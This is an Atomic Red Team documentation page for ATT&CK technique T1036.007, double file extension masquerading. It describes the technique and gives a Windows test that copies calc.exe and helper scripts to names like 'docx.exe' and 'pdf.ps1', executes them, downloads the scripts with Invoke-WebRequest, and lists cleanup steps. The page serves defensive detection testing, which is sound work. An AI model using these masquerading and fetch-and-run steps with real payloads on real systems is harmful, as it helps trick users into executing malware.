Skip to content
Atomic Red Team
atomics
T1036.007

T1036.007 - Masquerading: Double File Extension

Description from ATT&CK (opens in a new tab)

Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: File.txt.exe may render in some views as just File.txt). However, the second extension is the true file type that determines how the file is opened and executed. The real file extension may be hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured using or similar to the system’s policies.(Citation: PCMag DoubleExtension)(Citation: SOCPrime DoubleExtension)

Adversaries may abuse double extensions to attempt to conceal dangerous file types of payloads. A very common usage involves tricking a user into opening what they think is a benign file type but is actually executable code. Such files often pose as email attachments and allow an adversary to gain Initial Access (opens in a new tab) into a user’s system via Spearphishing Attachment (opens in a new tab) then User Execution (opens in a new tab). For example, an executable file attachment named Evil.txt.exe may display as Evil.txt to a user. The user may then view it as a benign text file and open it, inadvertently executing the hidden malware.(Citation: SOCPrime DoubleExtension)

Common file types, such as text files (.txt, .doc, etc.) and image files (.jpg, .gif, etc.) are typically used as the first extension to appear benign. Executable extensions commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension and true file type.

Atomic Tests


Atomic Test #1 - File Extension Masquerading

download and execute a file masquerading as images or Office files. Upon execution 3 calc instances and 3 vbs windows will be launched.

e.g SOME_LEGIT_NAME.[doc,docx,xls,xlsx,pdf,rtf,png,jpg,etc.].[exe,vbs,js,ps1,etc] (Quartelyreport.docx.exe)

Supported Platforms: Windows

auto_generated_guid: c7fa0c3b-b57f-4cba-9118-863bf4e653fc

Inputs:

NameDescriptionTypeDefault Value
exe_pathpath to exe to use when creating masquerading filespathC:\Windows\System32\calc.exe
vbs_pathpath of vbs to use when creating masquerading filespathPathToAtomicsFolder\T1036.007\src\T1036.007_masquerading.vbs
ps1_pathpath of powershell script to use when creating masquerading filespathPathToAtomicsFolder\T1036.007\src\T1036.007_masquerading.ps1

Attack Commands: Run with command_prompt!

copy "#{exe_path}" %temp%\T1036.007_masquerading.docx.exe /Y
copy "#{exe_path}" %temp%\T1036.007_masquerading.pdf.exe /Y
copy "#{exe_path}" %temp%\T1036.007_masquerading.ps1.exe /Y
copy "#{vbs_path}" %temp%\T1036.007_masquerading.xls.vbs /Y
copy "#{vbs_path}" %temp%\T1036.007_masquerading.xlsx.vbs /Y
copy "#{vbs_path}" %temp%\T1036.007_masquerading.png.vbs /Y
copy "#{ps1_path}" %temp%\T1036.007_masquerading.doc.ps1 /Y
copy "#{ps1_path}" %temp%\T1036.007_masquerading.pdf.ps1 /Y
copy "#{ps1_path}" %temp%\T1036.007_masquerading.rtf.ps1 /Y
%temp%\T1036.007_masquerading.docx.exe
%temp%\T1036.007_masquerading.pdf.exe
%temp%\T1036.007_masquerading.ps1.exe
%temp%\T1036.007_masquerading.xls.vbs
%temp%\T1036.007_masquerading.xlsx.vbs
%temp%\T1036.007_masquerading.png.vbs
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.007_masquerading.doc.ps1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.007_masquerading.pdf.ps1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.007_masquerading.rtf.ps1

Cleanup Commands:

del /f %temp%\T1036.007_masquerading.docx.exe > nul 2>&1
del /f %temp%\T1036.007_masquerading.pdf.exe > nul 2>&1
del /f %temp%\T1036.007_masquerading.ps1.exe > nul 2>&1
del /f %temp%\T1036.007_masquerading.xls.vbs > nul 2>&1
del /f %temp%\T1036.007_masquerading.xlsx.vbs > nul 2>&1
del /f %temp%\T1036.007_masquerading.png.vbs > nul 2>&1
del /f %temp%\T1036.007_masquerading.doc.ps1 > nul 2>&1
del /f %temp%\T1036.007_masquerading.pdf.ps1 > nul 2>&1
del /f %temp%\T1036.007_masquerading.rtf.ps1 > nul 2>&1

Dependencies: Run with powershell!

Description: File to copy must exist on disk at specified location (#{vbs_path})
Check Prereq Commands:
if (Test-Path "#{vbs_path}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path "#{vbs_path}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.007/src/T1036.007_masquerading.vbs" -OutFile "#{vbs_path}"
Description: File to copy must exist on disk at specified location (#{ps1_path})
Check Prereq Commands:
if (Test-Path "#{ps1_path}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path "#{ps1_path}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.007/src/T1036.007_masquerading.ps1" -OutFile "#{ps1_path}"